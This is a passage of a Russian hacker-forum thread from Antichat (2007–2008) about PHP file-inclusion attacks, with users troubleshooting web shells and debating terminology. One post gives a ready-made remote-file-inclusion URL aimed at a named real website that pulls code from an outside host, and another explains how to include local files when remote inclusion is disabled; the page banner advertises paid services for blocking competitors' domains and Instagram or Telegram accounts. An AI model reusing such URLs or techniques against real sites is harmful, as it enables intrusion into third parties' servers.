php injection

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > ИНФО > Статьи > Авторские статьи
php injection

Страница 4 из 8

Опции темы

Поиск в этой теме

Опции просмотра

#31

21.11.2007, 21:16

Sorx

Новичок

Регистрация: 21.11.2007

Сообщений: 4

С нами: 9721841

Репутация: 0

Таже ситуация перепробывал кучу веб-шєлов они грузяться показывают каталог с файлами а когда я хочу загрузить или перейти в другую папку они просто перезагружаються и опять показуют тотже каталог =(

#32

21.11.2007, 21:44

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

С нами: 10309346

Репутация: 4303

на nm.ru вроде выполняются PHP (не уверен)
вот
http://www.an-invest.ru/?id=http://ziroday.narod.ru/antichat
правда папок на запись там нет)

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#33

22.11.2007, 04:49

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

С нами: 10274726

Репутация: 1917

Я хотел бы еще сказать насчет терминологии:
все таки статья про php инклюдинг, а не про php инъекцию
php including - это подключение файлов, а
php injection - это внедрение php кода

например чтение /etc/passwd - никак не может быть инъекцией, т.к. никакого php кода не выполняется

а php injection это исполнение php комманд или кода ну допустим через eval или preg_replace т.д.

__________________
Карфаген должен быть разрушен...

#34

22.11.2007, 17:47

NOmeR1

Познавший АНТИЧАТ

Регистрация: 02.06.2006

Сообщений: 1,187

С нами: 10495046

Репутация: 2642

Цитата:

Сообщение от Scipio

Посмотрел бы вначале, когда статья была написана.

P.S. PHP Include - это и есть PHP Injection (один из видов)

#35

22.11.2007, 17:58

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

С нами: 10274726

Репутация: 1917

2NOmeR1 Я не думаю, что терминология со временем сильно изменилась, к тому же я не откапывал статью в недрах ачата, а ссылка на нее висела на головной странице форума

а насчет:

Цитата:

P.S. PHP Include - это и есть PHP Injection (один из видов)

ну может ты и прав, но сразу вспоминается аналогия:

Цитата:

Собака смертна
Я смертен
Я смертен, значит я - собака

__________________
Карфаген должен быть разрушен...

#36

22.11.2007, 18:11

GreenBear

наркоман с медалью

Регистрация: 07.05.2005

Сообщений: 3,704

С нами: 11058146

Репутация: 4536

что ты к словам придрался. малоли кто как говорят. тут суть ясна.

__________________
Фреймворк для спамера :(
Услуги программирования

#37

22.11.2007, 18:58

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

С нами: 10274726

Репутация: 1917

Да я вобщем то не придирался, я же не пишу срочно исправьте название, или афффтар не прав, просто написал насчет терминологии, да и то для меня это непринципиально,потому что как ты сказал:

Цитата:

малоли кто как говорят. тут суть ясна.

__________________
Карфаген должен быть разрушен...

#38

22.11.2007, 23:22

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

С нами: 10309346

Репутация: 4303

Цитата:

помню с Нитроксом спорил на эту темы
Вообще то инкдуинг - это именно include() или require(), ну я так считаю =)

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#39

10.03.2008, 04:22

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

С нами: 10516826

Репутация: 3742

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

че? какие еще линии? наркоман чтоле.

не получится у тебя в случае если урл акцес дизейблид.. тогда при меджик квоутс офф можешь локальные файлы подрубать. если же и они врублены, то тебе не повезло

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

#40

10.03.2008, 04:47

warlok

Постоянный

Регистрация: 18.02.2008

Сообщений: 368

С нами: 9594385

Репутация: 386

Не ну я конешно еше мало чё понимаю и етого неотрицаю...
Имел ввиду я ето

Цитата:

Сообщение от blackybr

Warning: main(dsdsds.php): failed to open stream: No such file or directory in /home/user/www//page.php on line 3

если незаметил то в конце написано on line 3 (ето я и имел ввиду)
а в моём варианте 63

Цитата:

Сообщение от blackybr

не получится у тебя в случае если урл акцес дизейблид.. тогда при меджик квоутс офф можешь локальные файлы подрубать

нашёт етого можно поподробней а тоя чето неочень понял

запрещён инклуд удалённых файлов, т.е вида (http://site/shell.php) а можно только подключать локальные (используя либо полный путь, либо отностительный) При выключенном параметре меджик квоутс кавычки не слэшируются, поэтому их можно использовать при указании полного пути подключаемого файла. Надеюсь понятно объяснил. -=lebed=-
ЗЫ попрошу неназывать мя наркаманом,ето не правда

Последний раз редактировалось -=lebed=-; 10.03.2008 в 10:21..

Страница 4 из 8

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Books PHP	FRAGNATIC	PHP	186	21.02.2010 02:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход